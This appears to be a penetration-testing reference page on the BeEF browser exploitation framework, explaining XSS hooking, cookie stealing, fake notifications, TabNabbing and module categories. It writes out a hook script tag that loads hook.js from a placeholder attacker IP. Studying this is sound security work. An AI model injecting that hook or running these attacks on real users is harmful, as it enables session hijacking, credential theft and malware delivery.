Browser Exploitation Framework (BeEF)#
BeEF is an exploitation framework for web application testing.
BeEF exploits browser vulnerabilities and interacts with one or more web browsers to launch directed command modules. Each browser can be configured in a different security context. BeEF allows you to launch a set of unique attack vectors and select specific modules in real time to target each browser and context.
- XSS vulnerabilities leverage input validation weaknesses on a web application. These vulnerabilities are often used to redirect users to malicious websites to steal cookies (session tokens) and other sensitive information. BeEF is a tool that can be used to manipulate users by leveraging XSS vulnerabilities.
- You can download BeEF from https://beefproject.com ↗ or https://github.com/beefproject/beef ↗.
- BeEF contains numerous command modules and uses a robust API that allows security professionals to quickly develop custom modules.
- BeEF is an application that runs in your browser. It allows you to take control of target browsers that visit a malicious web page that you have created. From there, a large number of exploits can be executed that affect the target browser.
In combination with social engineering attacks such as phishing emails, BeEF is an effective tool for information gathering, distributing malware, and many other browser-based exploits.
Launching BeEF#
The tool starts a web service on port 3000 by default. From there, the attacker can log in to a web console and manipulate users who are victims of XSS attacks.
Stealing a Browser Cookie#
Attackers can steal session tokens (browser cookies) using XSS and BeEF to hijack active user sessions.
Sending a Fake Notification#
Once a system is hooked, BeEF can be used to send fake notifications to the victim’s browser, often used for phishing or malware delivery.
Technical Overview#
BeEF enables penetration testers to “hook” web browsers by making a user execute a JavaScript file (hook.js). This provides persistent control over the browser context, allowing for reconnaissance, session hijacking, and internal network mapping.
Setup and Initialization#
- Start BeEF Service: Launch the application using the CLI.
bashsudo beef-xss - Access Control Panel: Open the Web UI at
http://127.0.0.1:3000/ui/panel. - Hooking a Browser: Redirect a target to a page containing the script:
html<script src="http://<ATK_IP>:3000/hook.js"></script>
Command Modules#
BeEF categorization uses a “Traffic Light” system:
- Green: Works and remains invisible to the user.
- Orange: Works but may be visible.
- White: Untested against the target browser.
- Red: Incompatible with the target.
Attack Vector Examples#
- Fake Notification Bar: Tricking users into downloading “required plug-ins” which are actually malicious payloads.
- TabNabbing: Redirecting idle tabs to fake login pages to harvest credentials.
- Cookie Stealing: Extracting
document.cookiedata for session hijacking.
Comparison: BeEF vs. SET#
While the Social-Engineer Toolkit (SET) specializes in cloning sites and email-based phishing, BeEF focuses on persistent command-and-control within the browser environment. They are often used in tandem for multi-stage exploits.